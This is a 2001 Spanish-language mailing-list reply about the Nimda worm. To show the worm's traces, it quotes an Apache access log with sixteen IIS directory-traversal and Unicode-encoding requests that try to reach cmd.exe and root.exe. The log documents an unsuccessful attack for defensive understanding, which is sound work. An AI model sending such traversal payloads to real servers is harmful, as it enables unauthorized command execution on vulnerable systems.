[Previo por Fecha] [Siguiente por Fecha] [Previo por Hilo] [Siguiente por Hilo]

[Hilos de Discusión] [Fecha] [Tema] [Autor]

Re: [Sop.Tec.LinuxPPP] Virus Nimda

On Wed, 19 Sep 2001, David Alfredo Daza Padron wrote:

> Me llama la atencion, pues dices que tu apache server esta registrando
> en su log
> este virus? lei los reportes de TrendMicro y el CERT y dicen que solo
> afectan
> a Win98 a 2000, podrias mandarnos una linea para conocer como registra
> tu log
> este virus?
> gracias
>
> "Juarez, Jose Antonio" wrote:
> >
> > Alguien sabe como hacer para que el archivo access.log no se vea afectado
> > por este virus...por que crece y crece....
> > aunque a mi apache no le haga nada....aqui me pego en varias maquinas y de
> > momento lo unico que hago es mediante el cron, limpiarlo.....y por otro
> > lado, alguna solucion para el sendmail... algo asi como la hubo para el
> > redcode ....

 Una muestra de Nimda en accion:

148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 290
148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 288
148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 298
148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 298
148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314
148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 335
148.205.x.x - - [18/Sep/2001:09:23:00 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 335
148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 363
148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315
148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 275
148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315
148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 315
148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314
148.205.x.x - - [18/Sep/2001:09:23:01 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 314

 Este es un registro de un ataque sin éxito en contra de un servidor
Apache. Como veran, ejecuta un minimo de 16 'exploits' conocidos de
Win+IIS para tratar de penetrar al sistema.

					Saludos
-- 
 (o- Cristian Othon Martinez Vera <cfuga en itam mx>  Pulchrum est paucorum
//\     http://eniac.rhon.itam.mx/~cfuga/          hominum.
v_/_

---------------------------------------------------------------------
Lista de soporte de LinuxPPP
 Reglas de la lista en http://linuxppp.com/reglas.html
[Hilos de Discusión] [Fecha] [Tema] [Autor]